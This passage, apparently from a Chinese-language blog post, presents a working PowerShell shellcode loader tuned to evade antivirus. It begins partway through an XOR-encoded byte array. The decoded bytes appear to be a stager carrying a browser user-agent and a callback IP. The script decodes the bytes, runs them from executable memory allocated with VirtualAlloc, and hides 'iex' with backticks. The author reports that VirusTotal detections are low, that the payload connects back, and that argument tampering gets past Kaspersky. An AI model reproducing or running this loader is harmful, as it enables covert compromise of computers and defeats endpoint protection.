143,132,75,108,20,228,40,40,219,93,196,44,12,83,181,197,183,140,187,182,195,26,1,235,229,8,214,145,94,229,11,74,89,21,61,246,169,212,227,73,109,146,110,18,37,107,165,236,67,233,57,57,132,195,192,253,22,130,134,203,5,64,45,219,43,231,240,58,225,196,50,35,118,80,70,81,14,98,68,70,77,87,25,3,110,76,89,74,79,79,66,12,22,13,19,3,11,64,76,78,83,66,87,74,65,79,70,24,3,110,112,106,102,3,26,13,19,24,3,116,74,77,71,76,84,80,3,109,119,3,21,13,19,24,3,116,108,116,21,23,24,3,119,81,74,71,70,77,87,12,22,13,19,24,3,78,80,77,3,108,83,87,74,78,74,89,70,71,106,102,27,24,102,109,118,112,10,46,41,35,76,130,208,229,40,148,3,132,8,249,88,206,170,65,157,12,251,89,110,80,9,229,67,57,67,226,222,56,234,156,209,173,167,127,106,229,255,164,140,186,2,115,71,154,218,20,30,182,198,39,61,57,78,236,95,144,219,18,208,161,52,50,184,46,144,144,135,58,141,35,160,68,208,153,80,217,164,139,161,110,121,83,124,79,38,178,152,105,86,195,72,148,214,98,155,177,223,114,17,149,213,73,222,11,89,101,51,184,218,168,113,168,231,219,170,45,126,239,130,235,12,174,133,70,193,109,79,243,124,211,53,236,92,221,94,27,5,152,191,195,125,231,120,31,52,237,63,146,163,150,248,168,211,181,197,98,48,76,139,135,229,179,235,10,138,53,164,99,169,172,176,155,186,132,70,128,229,126,5,113,9,150,30,250,128,67,192,138,98,255,240,16,157,121,178,35,75,211,150,129,117,220,246,73,99,75,35,51,35,35,75,35,35,99,35,116,75,123,135,112,198,220,246,176,154,35,35,35,35,34,250,114,112,170,196,116,75,35,3,35,35,112,117,75,49,181,170,193,220,246,166,227,87,229,168,36,34,224,166,227,86,198,123,224,203,138,222,220,220,18,20,17,13,18,21,13,17,13,27,27,35,49,23,117,91)

for ($x = 0; $x -lt $acode.Count; $x++) {
    $acode[$x] = $acode[$x] -bxor 35
}

$ava = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_b kernel32.dll VirtualAlloc), (func_a @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$abuffer = $ava.Invoke([IntPtr]::Zero, $acode.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($acode, 0, $abuffer, $acode.length)

$arunme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($abuffer, (func_a @([IntPtr]) ([Void])))
$arunme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
    start-job { param($a) ie`x $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
    i`ex $DoIt
}

https://www.virustotal.com/gui/file/4b907e0d3da03ee1c6c12541603cc2ac9849564e3358b706c1eb5fb0f94f1918/detection

ok了，也能正常上线

powershell -ExecutionPolicy bypass -File .\payload.ps1

执行命令，卡巴斯基会拦截，argue污染以下就行了。

文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。